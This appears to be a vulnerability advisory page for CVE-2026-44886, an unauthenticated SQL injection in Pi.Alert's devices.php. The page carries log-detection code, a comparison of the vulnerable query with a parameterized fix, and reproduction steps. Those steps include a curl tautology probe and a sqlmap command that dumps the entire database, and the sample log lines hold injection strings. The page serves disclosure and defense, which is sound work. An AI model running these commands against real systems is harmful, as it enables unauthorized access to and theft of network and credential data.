VYPR
High severity · NVD Advisory · Published May 27, 2026

CVE-2026-44886

Description

Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. From 2024-06-29 to before 2026-05-07, the web application endpoint is vulnerable to SQL injection. The /pialert/php/server/devices.php route accepts requests from unauthenticated users when the action URL parameter is set to getDevicesTotals. The scansource URL parameter is then concatenated into a SQL query. This vulnerability is fixed in the 2026-05-07 release.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Pi.Alert versions before 2026-05-07 allow unauthenticated blind SQL injection via the `scansource` parameter in `devices.php`, enabling full database extraction.

Vulnerability

In Pi.Alert, a LAN intruder detector with web monitoring, the /pialert/php/server/devices.php endpoint is vulnerable to SQL injection in versions from 2024-06-29 up to but not including the fix released on 2026-05-07. When the action parameter is set to getDevicesTotals, the authentication check is bypassed. The scansource URL parameter is then directly concatenated into SQL queries without sanitization, allowing injection of arbitrary SQLite commands [1].

Exploitation

An attacker does not need any authentication or special privileges; the vulnerable code path is reachable without a valid session. By sending a crafted HTTP request to /pialert/php/server/devices.php?action=getDevicesTotals&scansource=, the attacker can inject malicious SQL code. The injection is blind but can be exploited using boolean-based or time-based techniques to extract data from the database [1].

Impact

Successful exploitation allows an unauthenticated attacker to dump all data present in the SQLite database. This includes potentially sensitive information such as device details, network events, and any stored credentials or configuration secrets. The impact is primarily to confidentiality and integrity, since the attacker can read and possibly modify database content [1].

Mitigation

The vulnerability is fixed in the version released on 2026-05-07. Users should update Pi.Alert to the latest available version [1]. For installations that cannot immediately update, no workaround is explicitly provided in the available references; however, restricting network access to the web interface or placing it behind a VPN may reduce exposure. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of writing.
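For an installation that cannot update yet, the request shape the advisory gives is enough to write a log check. This added example (not from the advisory or the Pi.Alert project; the log lines, IPs and user agents are constructed) flags requests to the unauthenticated action whose `scansource` value contains anything beyond a plain token:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (hosts, IPs and agents are made up).
# Line 2 carries the advisory's probe, line 3 a generic tautology test, lines 1 and 4
# are benign traffic to the same script.
LOG_LINES = [
    '10.0.0.5 - - [27/May/2026:10:01:02 +0000] "GET /pialert/php/server/devices.php?action=getDevicesTotals&scansource=local HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2026:10:02:13 +0000] "GET /pialert/php/server/devices.php?action=getDevicesTotals&scansource=local%22%20OR%20%221%22%3D%221 HTTP/1.1" 200 41 "-" "curl/8.4.0"',
    '198.51.100.7 - - [27/May/2026:10:02:40 +0000] "GET /pialert/php/server/devices.php?action=getDevicesTotals&scansource=local%27%20AND%201%3D1-- HTTP/1.1" 200 41 "-" "sqlmap/1.8"',
    '10.0.0.5 - - [27/May/2026:10:03:00 +0000] "GET /pialert/php/server/devices.php?action=getDevices HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
]

# Client IP, timestamp, method, request target and status from a combined-format line.
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate scan source name is a bare token; quotes, spaces and operators are not.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_.-]*$")

def inspect(line):
    """Return a finding dict for a suspicious getDevicesTotals request, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/pialert/php/server/devices.php"):
        return None
    q = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    if q.get("action") != ["getDevicesTotals"]:
        return None
    suspicious = [v for v in q.get("scansource", []) if not SAFE_VALUE.match(v)]
    if not suspicious:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "scansource": suspicious[0]}

def scan(lines):
    """All findings for an iterable of access log lines, in log order."""
    return [hit for hit in map(inspect, lines) if hit]
```

Run the same check over the real access log of the web server in front of Pi.Alert; a hit with a 200 status from an address that never logged in is the pattern the advisory describes.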

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • Leiweibau/Pi.alert (inferred), 2 version ranges:
    • (no CPE) range: >=2024-06-29,<2026-05-07
    • (no CPE) range: <2026-05-07

Patches

No patches discovered yet (0).

Vulnerability mechanics

Root cause

"The `scansource` URL parameter is concatenated directly into a SQL query without sanitization or parameterization, and the `action=getDevicesTotals` path bypasses authentication checks."

Attack vector

An unauthenticated attacker sends a GET request to `/pialert/php/server/devices.php` with `action=getDevicesTotals` and a malicious `scansource` parameter [ref_id=1]. The `action=getDevicesTotals` value bypasses the authentication check, so even when password authentication is enabled, no login is required [ref_id=1]. The `scansource` value is injected into a SQL query via string concatenation in `getDeviceCondition()`, allowing the attacker to manipulate the query and exfiltrate database contents [ref_id=1].

Affected code

The vulnerable endpoint is `/pialert/php/server/devices.php`. When `action=getDevicesTotals` is set, the `scansource` URL parameter is passed unsanitized into the `getDeviceCondition()` function, which concatenates it directly into a SQL query string [ref_id=1]. The `getDevicesTotals()` function and `getDeviceCondition()` function are both in the same file [ref_id=1].

What the fix does

The advisory recommends two fixes: use parameterized queries to prevent SQL injection, and enforce authentication for the `getDevicesTotals` action when password authentication is enabled [ref_id=1]. The fix was released on 2026-05-07. No patch diff is included in the bundle, but the advisory's guidance directly addresses both the injection vector (unsanitized concatenation) and the authentication bypass (missing access control on the action).
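To show why the two recommended changes close the hole, here is an added example (not Pi.Alert's code; the table and column names, and the sample rows, are assumptions) that runs the concatenating condition builder the advisory describes and a parameterized, authenticated replacement against the same constructed SQLite table:

```python
import sqlite3

# Constructed sample data. The real Pi.Alert schema is not on the page, so the
# table and column names below are assumptions made for this example.
DEVICES = [
    ("00:11:22:33:44:55", "local", "phone"),
    ("00:11:22:33:44:66", "local", "laptop"),
    ("00:11:22:33:44:77", "arp-scan", "printer"),
]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Devices (dev_MAC TEXT, dev_ScanSource TEXT, dev_Name TEXT)")
    con.executemany("INSERT INTO Devices VALUES (?, ?, ?)", DEVICES)
    return con

def device_condition_vulnerable(scansource):
    # The pattern the advisory attributes to getDeviceCondition(): the URL value
    # is spliced into the WHERE clause as text, so quote characters in it
    # become SQL syntax instead of data.
    return "WHERE dev_ScanSource = '" + scansource + "'"

def totals_vulnerable(con, scansource):
    sql = "SELECT COUNT(*) FROM Devices " + device_condition_vulnerable(scansource)
    return con.execute(sql).fetchone()[0]

def totals_fixed(con, scansource, password_auth_enabled, session_valid):
    # Both corrections the advisory recommends: the action honours the login
    # check when password auth is on, and the value travels as a bound
    # parameter, so it can only ever be compared, never parsed.
    if password_auth_enabled and not session_valid:
        raise PermissionError("getDevicesTotals requires a valid session")
    sql = "SELECT COUNT(*) FROM Devices WHERE dev_ScanSource = ?"
    return con.execute(sql, (scansource,)).fetchone()[0]

def fixed_rejects_unauthenticated(con):
    """True when the fixed path refuses the action without a session."""
    try:
        totals_fixed(con, "local", password_auth_enabled=True, session_valid=False)
    except PermissionError:
        return True
    return False

# Single-quote variant of the advisory's probe (the advisory's own probe uses
# double quotes because of how the real code quotes the value).
PROBE = "local' OR '1'='1"
```

With the probe, the vulnerable builder counts every row (the "identical non-zero numbers" the reproduction step looks for), while the fixed query matches nothing because no device has that literal scan source.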

Preconditions

  • Network: attacker must be able to send HTTP requests to the Pi.Alert web application
  • Auth: no authentication required; the action=getDevicesTotals parameter bypasses the login check even when password auth is enabled

Reproduction

Step 1: Send a test request to confirm the vulnerability:

```
curl \
  --get \
  --data 'action=getDevicesTotals' \
  --data-urlencode 'scansource=local" OR "1"="1' \
  'http://<host>/pialert/php/server/devices.php'
```

An array of identical non-zero numbers (e.g., `[9,9,9,9,9,9,9]`) indicates the server is vulnerable [ref_id=1].

Step 2: Use sqlmap to dump the database:

```
sqlmap \
  -u 'http://<host>/pialert/php/server/devices.php?action=getDevicesTotals&scansource=local' \
  -p scansource \
  --batch \
  --level=2 \
  --dump-all
```

[ref_id=1]

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
